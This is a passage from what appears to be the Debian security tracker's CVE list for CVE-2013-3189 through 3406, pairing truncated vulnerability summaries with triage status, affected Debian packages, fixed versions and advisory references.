	NOT-FOR-US: Cisco
CVE-2013-3406 (The "Files Available for Download" implementation in the Cisco Intelli ...)
	NOT-FOR-US: Cisco
CVE-2013-3405 (The web portal in TC software on Cisco TelePresence endpoints does not ...)
	NOT-FOR-US: Cisco
CVE-2013-3404 (SQL injection vulnerability in Cisco Unified Communications Manager (C ...)
	NOT-FOR-US: Cisco
CVE-2013-3403 (Multiple untrusted search path vulnerabilities in Cisco Unified Commun ...)
	NOT-FOR-US: Cisco
CVE-2013-3402 (An unspecified function in Cisco Unified Communications Manager (CUCM) ...)
	NOT-FOR-US: Cisco
CVE-2013-3401 (The SIP implementation in Cisco TelePresence TC Software allows remote ...)
	NOT-FOR-US: Cisco
CVE-2013-3400 (The license-installation module in Cisco NX-OS on Nexus 1000V devices ...)
	NOT-FOR-US: Cisco
CVE-2013-3399 (Buffer overflow in an unspecified Android API on the Cisco Desktop Col ...)
	NOT-FOR-US: Cisco
CVE-2013-3398 (The web framework in Cisco Prime Central for Hosted Collaboration Solu ...)
	NOT-FOR-US: Cisco
CVE-2013-3397 (Cross-site request forgery (CSRF) vulnerability in the Unified Service ...)
	NOT-FOR-US: Cisco
CVE-2013-3396 (Cross-site scripting (XSS) vulnerability in the web framework in Cisco ...)
	NOT-FOR-US: Cisco
CVE-2013-3395 (Cross-site request forgery (CSRF) vulnerability in the web framework o ...)
	NOT-FOR-US: Cisco IronPort Web Security Appliance
CVE-2013-3394 (Cross-site scripting (XSS) vulnerability in the web interface in Cisco ...)
	NOT-FOR-US: Cisco
CVE-2013-3393 (The Precision Video Engine component in Cisco Jabber for Windows and C ...)
	NOT-FOR-US: Cisco
CVE-2013-3392 (Multiple cross-site request forgery (CSRF) vulnerabilities in Cisco We ...)
	NOT-FOR-US: Cisco WebEx Social
CVE-2013-3391
	RESERVED
CVE-2013-3390 (Memory leak in Cisco Prime Central for Hosted Collaboration Solution ( ...)
	NOT-FOR-US: Cisco Prime Central
CVE-2013-3389 (Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance ...)
	NOT-FOR-US: Cisco Prime Central
CVE-2013-3388 (Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance ...)
	NOT-FOR-US: Cisco Prime Central
CVE-2013-3387 (Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance ...)
	NOT-FOR-US: Cisco Prime Central
CVE-2013-3386 (The IronPort Spam Quarantine (ISQ) component in the web framework in I ...)
	NOT-FOR-US: Cisco
CVE-2013-3385 (The management GUI in the web framework in IronPort AsyncOS on Cisco W ...)
	NOT-FOR-US: Cisco
CVE-2013-3384 (The web framework in IronPort AsyncOS on Cisco Web Security Appliance ...)
	NOT-FOR-US: Cisco
CVE-2013-3383 (The web framework in IronPort AsyncOS on Cisco Web Security Appliance ...)
	NOT-FOR-US: Cisco
CVE-2013-3382 (The Next-Generation Firewall (aka NGFW, formerly CX Context-Aware Secu ...)
	NOT-FOR-US: Cisco ASA
CVE-2013-3381 (Cisco Hosted Collaboration Mediation allows remote attackers to cause ...)
	NOT-FOR-US: Cisco Hosted Collaboration Mediation
CVE-2013-3380 (The administrative web interface in the Access Control Server in Cisco ...)
	NOT-FOR-US: Cisco Secure Access Control System
CVE-2013-3379 (The firewall subsystem in Cisco TelePresence TC Software before 4.2 do ...)
	NOT-FOR-US: Cisco TelePresence TC Software
CVE-2013-3378 (Cisco TelePresence TC Software before 6.1 and TE Software before 4.1.3 ...)
	NOT-FOR-US: Cisco TelePresence TC Software
CVE-2013-3377 (Cisco TelePresence TC Software before 5.1.7 and TE Software before 4.1 ...)
	NOT-FOR-US: Cisco TelePresence TC Software
CVE-2013-3376 (Open redirect vulnerability in the help page in Cisco Video Surveillan ...)
	NOT-FOR-US: Cisco
CVE-2013-3375 (Cross-site scripting (XSS) vulnerability in the portal page in Cisco P ...)
	NOT-FOR-US: Cisco
CVE-2013-3374 (Unspecified vulnerability in Request Tracker (RT) 3.8.x before 3.8.17 ...)
	{DSA-2671-1 DSA-2670-1}
	- request-tracker3.8
	- request-tracker4 4.0.12-2 (bug #709836)
CVE-2013-3373 (CRLF injection vulnerability in Request Tracker (RT) 3.8.x before 3.8. ...)
	{DSA-2671-1 DSA-2670-1}
	- request-tracker3.8
	- request-tracker4 4.0.12-2 (bug #709836)
CVE-2013-3372 (Request Tracker (RT) 3.8.x before 3.8.17 and 4.0.x before 4.0.13 allow ...)
	{DSA-2671-1 DSA-2670-1}
	- request-tracker3.8
	- request-tracker4 4.0.12-2 (bug #709836)
CVE-2013-3371 (Cross-site scripting (XSS) vulnerability in Request Tracker (RT) 3.8.3 ...)
	{DSA-2671-1 DSA-2670-1}
	- request-tracker3.8
	- request-tracker4 4.0.12-2 (bug #709836)
CVE-2013-3370 (Request Tracker (RT) 3.8.x before 3.8.17 and 4.0.x before 4.0.13 does ...)
	{DSA-2671-1 DSA-2670-1}
	- request-tracker3.8
	- request-tracker4 4.0.12-2 (bug #709836)
CVE-2013-3369 (Request Tracker (RT) 3.8.x before 3.8.17 and 4.0.x before 4.0.13 allow ...)
	{DSA-2671-1 DSA-2670-1}
	- request-tracker3.8
	- request-tracker4 4.0.12-2 (bug #709836)
CVE-2013-3368 (bin/rt in Request Tracker (RT) 3.8.x before 3.8.17 and 4.0.x before 4. ...)
	{DSA-2671-1 DSA-2670-1}
	- request-tracker3.8
	- request-tracker4 4.0.12-2 (bug #709836)
CVE-2013-3367 (Undocumented TELNET service in TRENDnet TEW-691GR and TEW-692GR when a ...)
	NOT-FOR-US: TRENDnet
CVE-2013-3366 (Undocumented TELNET service in TRENDnet TEW-812DRU when a web page nam ...)
	NOT-FOR-US: TRENDnet
CVE-2013-3365 (TRENDnet TEW-812DRU router allows remote authenticated users to execut ...)
	NOT-FOR-US: TRENDnet TEW-812DRU router
CVE-2013-3364
	RESERVED
CVE-2013-3363 (Adobe Flash Player before 11.7.700.242 and 11.8.x before 11.8.800.168 ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3362 (Adobe Flash Player before 11.7.700.242 and 11.8.x before 11.8.800.168 ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3361 (Adobe Flash Player before 11.7.700.242 and 11.8.x before 11.8.800.168 ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3360 (Adobe Shockwave Player before 12.0.4.144 allows attackers to execute a ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-3359 (Adobe Shockwave Player before 12.0.4.144 allows attackers to execute a ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-3358 (Integer overflow in Adobe Reader and Acrobat before 10.1.8 and 11.x be ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3357 (Integer overflow in Adobe Reader and Acrobat before 10.1.8 and 11.x be ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3356 (Buffer overflow in Adobe Reader and Acrobat before 10.1.8 and 11.x bef ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3355 (Adobe Reader and Acrobat before 10.1.8 and 11.x before 11.0.04 on Wind ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3354 (Adobe Reader and Acrobat before 10.1.8 and 11.x before 11.0.04 on Wind ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3353 (Buffer overflow in Adobe Reader and Acrobat before 10.1.8 and 11.x bef ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3352 (Adobe Reader and Acrobat before 10.1.8 and 11.x before 11.0.04 on Wind ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3351 (Multiple stack-based buffer overflows in Adobe Reader and Acrobat befo ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3350 (Adobe ColdFusion 10 before Update 11 allows remote attackers to call C ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-3349 (Unspecified vulnerability in Adobe ColdFusion 9.0 through 9.0.2, when ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-3348 (Adobe Shockwave Player before 12.0.3.133 allows attackers to execute a ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-3347 (Integer overflow in Adobe Flash Player before 11.7.700.232 and 11.8.x ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3346 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3345 (Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 o ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3344 (Heap-based buffer overflow in Adobe Flash Player before 11.7.700.232 a ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3343 (Adobe Flash Player before 10.3.183.90 and 11.x before 11.7.700.224 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3342 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3341 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3340 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3339 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3338 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3337 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...)
	NOT-FOR-US: Adobe Reader
CVE-2013-3336 (Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 1 ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-3335 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3334 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3333 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3332 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3331 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3330 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3329 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3328 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3327 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3326 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3325 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3324 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2013-3323 (A Privilege Escalation Vulnerability exists in IBM Maximo Asset Manage ...)
	NOT-FOR-US: IBM
CVE-2013-3322 (NetApp OnCommand System Manager 2.1 and earlier allows remote attacker ...)
	NOT-FOR-US: NetApp OnCommand System Manager
CVE-2013-3321 (NetApp OnCommand System Manager 2.1 and earlier allows remote attacker ...)
	NOT-FOR-US: NetApp
CVE-2013-3320 (Cross-site Scripting (XSS) vulnerability in NetApp OnCommand System Ma ...)
	NOT-FOR-US: NetApp
CVE-2013-3319 (The GetComputerSystem method in the HostControl service in SAP Netweav ...)
	NOT-FOR-US: SAP Netweaver
CVE-2013-3318
	REJECTED
CVE-2013-3317 (Netgear WNR1000v3 with firmware before 1.0.2.60 contains an Authentica ...)
	NOT-FOR-US: Netgear
CVE-2013-3316 (Netgear WNR1000v3 with firmware before 1.0.2.60 contains an Authentica ...)
	NOT-FOR-US: Netgear
CVE-2013-3315 (The server in TIBCO Silver Mobile 1.1.0 does not properly verify acces ...)
	NOT-FOR-US: TIBCO
CVE-2013-3314 (The Loftek Nexus 543 IP Camera allows remote attackers to obtain (1) I ...)
	NOT-FOR-US: Loftek Nexus 543 IP Camera
CVE-2013-3313 (The Loftek Nexus 543 IP Camera stores passwords in cleartext, which al ...)
	NOT-FOR-US: Loftek Nexus 543 IP Camera
CVE-2013-3312 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Loft ...)
	NOT-FOR-US: Loftek Nexus 543 IP Camera
CVE-2013-3311 (Directory traversal vulnerability in the Loftek Nexus 543 IP Camera al ...)
	NOT-FOR-US: Loftek Nexus 543 IP Camera
CVE-2013-3310
	RESERVED
CVE-2013-3309
	RESERVED
CVE-2013-3308
	RESERVED
CVE-2013-3307
	RESERVED
CVE-2013-3306
	RESERVED
CVE-2013-3305
	RESERVED
CVE-2013-3304 (Directory traversal vulnerability in Dell EqualLogic PS4000 with firmw ...)
	NOT-FOR-US: Dell EqualLogic PS4000
CVE-2013-3303
	RESERVED
CVE-2013-3300 (The JsonParser class in json/JsonParser.scala in Lift before 2.5 inter ...)
	NOT-FOR-US: Lift Framework
CVE-2013-3299 (RealNetworks RealPlayer 16.0.2.32 and earlier allows remote attackers ...)
	NOT-FOR-US: RealPlayer
CVE-2013-3298
	RESERVED
CVE-2013-3297
	RESERVED
CVE-2013-3296
	RESERVED
CVE-2013-3295 (Directory traversal vulnerability in install/popup.php in Exponent CMS ...)
	NOT-FOR-US: Exponent CMS
CVE-2013-3294 (Multiple SQL injection vulnerabilities in Exponent CMS before 2.2.0 re ...)
	NOT-FOR-US: Exponent CMS
CVE-2013-3293
	RESERVED
CVE-2013-3292
	RESERVED
CVE-2013-3291
	RESERVED
CVE-2013-3290
	RESERVED
CVE-2013-3289
	REJECTED
CVE-2013-3288 (Cross-site scripting (XSS) vulnerability on the EMC RSA Data Protectio ...)
	NOT-FOR-US: EMC
CVE-2013-3287 (EMC Unisphere for VMAX before 1.6.1.6, when using an unspecified level ...)
	NOT-FOR-US: EMC Unisphere for VMAX
CVE-2013-3286 (Multiple cross-site scripting (XSS) vulnerabilities in EMC Documentum ...)
	NOT-FOR-US: EMC Documentum
CVE-2013-3285 (The NetWorker Management Console (NMC) in EMC NetWorker 8.0.x before 8 ...)
	NOT-FOR-US: EMC NetWorker
CVE-2013-3284
	REJECTED
CVE-2013-3283
	REJECTED
CVE-2013-3282
	REJECTED
CVE-2013-3281 (Cross-site scripting (XSS) vulnerability in EMC Documentum Webtop befo ...)
	NOT-FOR-US: EMC Documentum
CVE-2013-3280 (EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet I ...)
	NOT-FOR-US: RSA Authentication Agent for Web for Internet Information Services
CVE-2013-3279 (EMC Atmos before 2.1.4 has a blank password for the PostgreSQL account ...)
	NOT-FOR-US: EMC
CVE-2013-3278 (EMC VPLEX before VPLEX GeoSynchrony 5.2 SP1 uses cleartext for storage ...)
	NOT-FOR-US: EMC
CVE-2013-3277 (Open redirect vulnerability in EMC RSA Archer GRC 5.x before 5.4 allow ...)
	NOT-FOR-US: EMC
CVE-2013-3276 (EMC RSA Archer GRC 5.x before 5.4 allows remote authenticated users to ...)
	NOT-FOR-US: EMC
CVE-2013-3275 (EMC Avamar Server and Avamar Virtual Edition before 7.0 on Data Store ...)
	NOT-FOR-US: EMC
CVE-2013-3274 (EMC Avamar Server and Avamar Virtual Edition before 7.0 on Data Store ...)
	NOT-FOR-US: EMC
CVE-2013-3273 (EMC RSA Authentication Manager 8.0 before P2 and 7.1 before SP4 P26, a ...)
	NOT-FOR-US: EMC
CVE-2013-3272 (EMC Replication Manager (RM) before 5.4.4 places encoded passwords in ...)
	NOT-FOR-US: EMC
CVE-2013-3271 (EMC RSA Authentication Agent for PAM 7.0 before 7.0.2.1 enforces the m ...)
	NOT-FOR-US: EMC
CVE-2013-3270 (EMC VNX Control Station before 7.1.70.2 and Celerra Control Station be ...)
	NOT-FOR-US: EMC
CVE-2013-3302 (Race condition in the smb_send_rqst function in fs/cifs/transport.c in ...)
	- linux-2.6 (Introduced in 3.7)
	- linux 3.8-1
	[wheezy] - linux (Introduced in 3.7)
CVE-2013-3301 (The ftrace implementation in the Linux kernel before 3.8.8 allows loca ...)
	{DSA-2669-1}
	- linux-2.6 (Vulnerable code not present)
	- linux 3.8.11-1 (low)
	NOTE: https://git.kernel.org/linus/6a76f8c0ab19f215af2a3442870eeb5f0e81998d
	NOTE: Not enabled in default kernels
CVE-2013-3269 (Cross-site request forgery (CSRF) vulnerability in Cybozu Office befor ...)
	NOT-FOR-US: Cybozu Office
CVE-2013-3268 (Novell iManager 2.7 before SP6 Patch 1 does not refresh a token after ...)
	NOT-FOR-US: Novell iManager
CVE-2013-3267 (Cross-site scripting (XSS) vulnerability in the highlighter plugin in ...)
	NOT-FOR-US: Joomla!
CVE-2013-3266 (The nfsrvd_readdir function in sys/fs/nfsserver/nfs_nfsdport.c in the ...)
	{DSA-2672-1}
	- kfreebsd-9 9.0-11 (bug #706414)
	- kfreebsd-8 (bug #706418)
	[wheezy] - kfreebsd-8 (new NFS server is not enabled)
	[squeeze] - kfreebsd-8 (new NFS server is not enabled)
	NOTE: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:05.nfsserver.asc
CVE-2013-3265
	RESERVED
CVE-2013-3264 (The WP Ultimate Email Marketer plugin 1.1.0 and possibly earlier for W ...)
	NOT-FOR-US: WP Ultimate Email Marketer
CVE-2013-3263 (Multiple cross-site scripting (XSS) vulnerabilities in the WP Ultimate ...)
	NOT-FOR-US: WP Ultimate Email Marketer
CVE-2013-3262 (Cross-site scripting (XSS) vulnerability in admin/admin.php in the Dow ...)
	NOT-FOR-US: WordPress plugin download-monitor
CVE-2013-3261 (Cross-site scripting (XSS) vulnerability in wp-admin/admin.php in the ...)
	NOT-FOR-US: WordPress plugin flash-album-gallery
CVE-2013-3260 (Heap-based buffer overflow in INMATRIX Zoom Player before 8.7 beta 11 ...)
	NOT-FOR-US: INMATRIX Zoom Player
CVE-2013-3259 (Stack-based buffer overflow in INMATRIX Zoom Player before 8.7 beta 11 ...)
	NOT-FOR-US: INMATRIX Zoom Player
CVE-2013-3258 (Cross-site request forgery (CSRF) vulnerability in he Digg Digg plugin ...)
	NOT-FOR-US: WordPress plugin digg-digg
CVE-2013-3257 (Cross-site request forgery (CSRF) vulnerability in the Related Posts p ...)
	NOT-FOR-US: WordPress plugin related-posts
CVE-2013-3256 (Cross-site request forgery (CSRF) vulnerability in the Shareaholic Sex ...)
	NOT-FOR-US: WordPress plugin sexybookmarks
CVE-2013-3255
	RESERVED
CVE-2013-3254 (Cross-site scripting (XSS) vulnerability in wp-admin/admin.php in the ...)
	NOT-FOR-US: WordPress plugin
CVE-2013-3253 (Cross-site request forgery (CSRF) vulnerability in admin/setting.php i ...)
	NOT-FOR-US: WordPress plugin
CVE-2013-3252 (Cross-site request forgery (CSRF) vulnerability in the options admin p ...)
	NOT-FOR-US: WordPress plugin WP-PostViews
CVE-2013-3251 (Cross-site request forgery (CSRF) vulnerability in the qTranslate plug ...)
	NOT-FOR-US: WordPress plugin qTranslate
CVE-2013-3250 (Cross-site request forgery (CSRF) vulnerability in the WP Maintenance ...)
	NOT-FOR-US: WP Maintenance Mode plugin for Wordpress
CVE-2013-3249 (Stack-based buffer overflow in the "Add from text file" feature in the ...)
	NOT-FOR-US: DameWare Remote Support
CVE-2013-3248 (Untrusted search path vulnerability in Corel PDF Fusion 1.11 allows lo ...)
	NOT-FOR-US: Corel PDF Fusion
CVE-2013-3247 (Heap-based buffer overflow in xnview.exe in XnView before 2.03 allows ...)
	NOT-FOR-US: XnView
CVE-2013-3246 (Stack-based buffer overflow in xnview.exe in XnView before 2.03 allows ...)
	NOT-FOR-US: XnView
CVE-2013-3245 (** DISPUTED ** plugins/demux/libmkv_plugin.dll in VideoLAN VLC Media P ...)
	- vlc 2.0.7-1 (unimportant)
	NOTE: Harmless crasher
	NOTE: http://git.videolan.org/?p=vlc.git;a=commit;h=59c9e8309d5b435a2d85c2c9eaae979ba56ccdd9
	NOTE: http://secunia.com/blog/372/
	NOTE: http://www.jbkempf.com/blog/post/2013/More-lies-from-Secunia
CVE-2013-3244 (Multiple unspecified vulnerabilities in the CJDB_FILL_MEMORY_FROM_PPB ...)
	NOT-FOR-US: SAP ERP Central Component
CVE-2013-3243 (Unspecified vulnerability in OpenText/IXOS ECM for SAP NetWeaver allow ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2013-3242 (plugins/system/remember/remember.php in Joomla! 2.5.x before 2.5.10 an ...)
	NOT-FOR-US: Joomla!
CVE-2013-3241 (export.php (aka the export script) in phpMyAdmin 4.x before 4.0.0-rc3 ...)
	- phpmyadmin (Vulnerable code not present)
CVE-2013-3240 (Directory traversal vulnerability in the Export feature in phpMyAdmin ...)
	- phpmyadmin (Vulnerable code not present)
CVE-2013-3239 (phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir ...)
	{DLA-0014-1}
	- phpmyadmin 4:3.4.11.1-2
	[squeeze] - phpmyadmin 4:3.3.7-8
	NOTE: Requires non-default option saveDir to be enabled, an authenticated untrusted user and Apache mod_mime
CVE-2013-3238 (phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3 allows remote a ...)
	- phpmyadmin (exploitable PHP on Windows only)
	NOTE: code patched in 4:3.4.11.1-2 nonetheless
CVE-2013-3237 (The vsock_stream_sendmsg function in net/vmw_vsock/af_vsock.c in the L ...)
	- linux-2.6 (net/vmw_vsock/af_vsock.c not present)
	- linux (net/vmw_vsock/af_vsock.c not present)
	- open-vm-tools 2:9.2.2-893683-8 (low; bug #706557)
	[wheezy] - open-vm-tools (Minor information leak)
	[squeeze] - open-vm-tools (Contrib not supported, minor information leak)
CVE-2013-3236 (The vmci_transport_dgram_dequeue function in net/vmw_vsock/vmci_transp ...)
	- linux-2.6 (VM Sockets only introduced in 3.9-rc1)
	- linux (VM Sockets introduced in 3.9-rc1)
CVE-2013-3235 (net/tipc/socket.c in the Linux kernel before 3.9-rc7 does not initiali ...)
	{DSA-2669-1 DSA-2668-1}
	- linux-2.6 (low)
	- linux 3.8.11-1 (low)
CVE-2013-3234 (The rose_recvmsg function in net/rose/af_rose.c in the Linux kernel be ...)
	{DSA-2669-1 DSA-2668-1}
	- linux-2.6 (low)
	- linux 3.8.11-1 (low)
CVE-2013-3233 (The llcp_sock_recvmsg function in net/nfc/llcp/sock.c in the Linux ker ...)
	- linux-2.6 (net/nfc/llcp/sock.c not present, introduced in 3.3)
	- linux (net/nfc/llcp/sock.c not present, introduced in 3.3)
CVE-2013-3232 (The nr_recvmsg function in net/netrom/af_netrom.c in the Linux kernel ...)
	- linux-2.6 (Introduced and fixed during 3.9 cycle)
	- linux (Introduced and fixed during 3.9 cycle)
CVE-2013-3231 (The llc_ui_recvmsg function in net/llc/af_llc.c in the Linux kernel be ...)
	{DSA-2669-1 DSA-2668-1}
	- linux-2.6 (low)
	- linux 3.8.11-1 (low)
CVE-2013-3230 (The l2tp_ip6_recvmsg function in net/l2tp/l2tp_ip6.c in the Linux kern ...)
	- linux-2.6 (net/l2tp/l2tp_ip6.c not present)
	- linux (net/l2tp/l2tp_ip6.c introduced in 3.5)
CVE-2013-3229 (The iucv_sock_recvmsg function in net/iucv/af_iucv.c in the Linux kern ...)
	{DSA-2669-1 DSA-2668-1}
	- linux-2.6 (low)
	- linux 3.8.11-1 (low)
CVE-2013-3228 (The irda_recvmsg_dgram function in net/irda/af_irda.c in the Linux ker ...)
	{DSA-2669-1 DSA-2668-1}
	- linux-2.6 (low)
	- linux 3.8.11-1 (low)
CVE-2013-3227 (The caif_seqpkt_recvmsg function in net/caif/caif_socket.c in the Linu ...)
	{DSA-2669-1}
	- linux-2.6 (net/caif/caif_socket.c introduced in v2.6.35)
	- linux 3.8.11-1 (low)
CVE-2013-3226 (The sco_sock_recvmsg function in net/bluetooth/sco.c in the Linux kern ...)
	- linux-2.6 (Vulnerable code not yet present)
	- linux (Vulnerable code not yet present)
	NOTE: sco_sock_recvmsg only introduced with v3.8, bt_sock_recvmsg has its own CVE ID
CVE-2013-3225 (The rfcomm_sock_recvmsg function in net/bluetooth/rfcomm/sock.c in the ...)
	{DSA-2669-1 DSA-2668-1}
	- linux-2.6 (low)
	- linux 3.8.11-1 (low)
CVE-2013-3224 (The bt_sock_recvmsg function in net/bluetooth/af_bluetooth.c in the Li ...)
	{DSA-2669-1 DSA-2668-1}
	- linux-2.6 (low)
	- linux 3.8.11-1 (low)
CVE-2013-3223 (The ax25_recvmsg function in net/ax25/af_ax25.c in the Linux kernel be ...)
	{DSA-2669-1 DSA-2668-1}
	- linux-2.6 (low)
	- linux 3.8.11-1 (low)
CVE-2013-3222 (The vcc_recvmsg function in net/atm/common.c in the Linux kernel befor ...)
	{DSA-2669-1 DSA-2668-1}
	- linux-2.6 (low)
	- linux 3.8.11-1 (low)
CVE-2013-3221 (The Active Record component in Ruby on Rails 2.3.x, 3.0.x, 3.1.x, and ...)
	- rails-3.2 (unimportant)
	- ruby-activerecord-3.2 (unimportant)
	- ruby-activerecord-2.3 (unimportant)
	[wheezy] - ruby-activerecord-2.3
	- rails 2.3.14.1 (unimportant)
	NOTE: Starting with 2.3.14.1 rails is a transition package
	NOTE: This is a general design problem and only mitigated by documented best practices
CVE-2013-3220 (bitcoind and Bitcoin-Qt before 0.4.9rc2, 0.5.x before 0.5.8rc2, 0.6.x ...)
	- bitcoin 0.8.1-1
CVE-2013-3219 (bitcoind and Bitcoin-Qt 0.8.x before 0.8.1 do not enforce a certain bl ...)
	- bitcoin 0.8.1-1
CVE-2013-3218
	RESERVED
CVE-2013-3217
	RESERVED
CVE-2013-3216
	RESERVED
CVE-2013-3215 (vtiger CRM 5.4.0 and earlier contain an Authentication Bypass Vulnerab ...)
	NOT-FOR-US: vtiger CRM
CVE-2013-3214 (vtiger CRM 5.4.0 and earlier contain a PHP Code Injection Vulnerabilit ...)
	NOT-FOR-US: vtiger CRM
CVE-2013-3213 (Multiple SQL injection vulnerabilities in vTiger CRM 5.0.0 through 5.4 ...)
	NOT-FOR-US: vTiger CRM
CVE-2013-3212 (vtiger CRM 5.4.0 and earlier contain local file-include vulnerabilitie ...)
	NOT-FOR-US: vtiger CRM
CVE-2013-3211 (Unspecified vulnerability in Opera before 12.15 has unknown impact and ...)
	NOT-FOR-US: Opera
CVE-2013-3210 (Opera before 12.15 does not properly block top-level domains in Set-Co ...)
	NOT-FOR-US: Opera
CVE-2013-3209 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...)
	NOT-FOR-US: Microsoft
CVE-2013-3208 (Microsoft Internet Explorer 8 through 10 allows remote attackers to ex ...)
	NOT-FOR-US: Microsoft
CVE-2013-3207 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3206 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...)
	NOT-FOR-US: Microsoft
CVE-2013-3205 (Microsoft Internet Explorer 6 through 8 allows remote attackers to exe ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3204 (Microsoft Internet Explorer 7 through 10 allows remote attackers to ex ...)
	NOT-FOR-US: Microsoft
CVE-2013-3203 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3202 (Microsoft Internet Explorer 10 allows remote attackers to execute arbi ...)
	NOT-FOR-US: Microsoft
CVE-2013-3201 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3200 (The USB drivers in the kernel-mode drivers in Microsoft Windows XP SP2 ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-3199 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3198 (The NT Virtual DOS Machine (NTVDM) subsystem in the kernel in Microsof ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-3197 (The NT Virtual DOS Machine (NTVDM) subsystem in the kernel in Microsof ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-3196 (The NT Virtual DOS Machine (NTVDM) subsystem in the kernel in Microsof ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-3195 (The DSA_InsertItem function in Comctl32.dll in the Windows common cont ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-3194 (Microsoft Internet Explorer 9 allows remote attackers to execute arbit ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3193 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3192 (Cross-site scripting (XSS) vulnerability in Microsoft Internet Explore ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3191 (Microsoft Internet Explorer 9 and 10 allows remote attackers to execut ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3190 (Microsoft Internet Explorer 8 through 10 allows remote attackers to ex ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-3189 (Microsoft Internet Explorer 8 and 9 allows remote attackers to execute ...)
